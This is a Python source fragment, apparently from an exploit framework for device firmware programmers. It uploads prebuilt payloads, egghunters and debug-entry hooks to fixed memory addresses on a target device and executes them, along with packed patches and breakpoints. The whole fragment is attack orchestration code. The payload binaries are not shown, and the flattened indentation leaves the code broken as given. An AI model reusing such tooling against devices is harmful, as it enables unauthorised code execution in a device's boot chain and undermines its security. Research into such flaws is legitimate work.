def upload_fh():
target = t.get()
FH_FW.sendfile("../device/build/fh64.payload", target.fh_base_programmer)
# e = XMLHunter(file("../device/build/fh64.payload","rb").read(),
# target.fh_base_programmer, target)
# e.send()
return
def hook_handlers():
target = t.get()
I("Hooking handlers")
for i in xrange(16):
I("%d" % i)
FH_FW.sendfile("../device/build/dbgentry64.payload",
0xf803f000 + i * 0x80)
def upload_fh_data():
target = t.get()
bbdb = BasicBlocks(target.basicblocks_db_pbl)
bpm = BreakpointManager(bbdb)
#bpm.bp_programmer(0xF801DAFC, msg="peek0")
#bpm.bp_programmer(0xF801DA08, msg="poke")
pm = PatchManager()
# pm.patch32_programmer(0x1402C958, 0xFFFFFFFF)
I('applying patches and breakpoints...')
I('creating pagecopy...')
pages = set()
I('pages: ' + str(pages))
pc = PageCopy(MODE_PBL,
target.pbl_base_addr,
target.pbl_copy_addr,
pages,
target_pages=[
0x807D000, 0x807E000, 0x807F000, 0x807C000, 0x8068000,
0x806e000, 0x807B000
])
I('uploading firehorse data...')
fh = Firehorse(pm, bpm, pc)
fhdata = fh.pack()
fhbin = file("../tmp/fh.bin", "wb")
fhbin.write(fhdata)
fhbin.close()
FH_FW.sendfile("../tmp/fh.bin",
target.fh_base_programmer + target.fh_scratch_offset)
def upload_init64():
target = t.get()
FH_FW.sendfile("../device/build/init64.payload", target.fh_base_programmer)
FH_FW.exe64(target.fh_base_programmer)
def upload_xmlhunter(self):
I('uploading xmlhunter to %08x' % self.target.egghunter_base)
FH_FW.sendfile("../device/build/xmlhunt.payload",
self.target.egghunter_base)
XMLHunter.uploaded = True
def upload_egghunter(self):
I('uploading egghunter to %08x' % self.target.egghunter_base)
FH_FW.sendfile("../device/build/dload.payload",
self.target.egghunter_base)
Egg.uploaded = True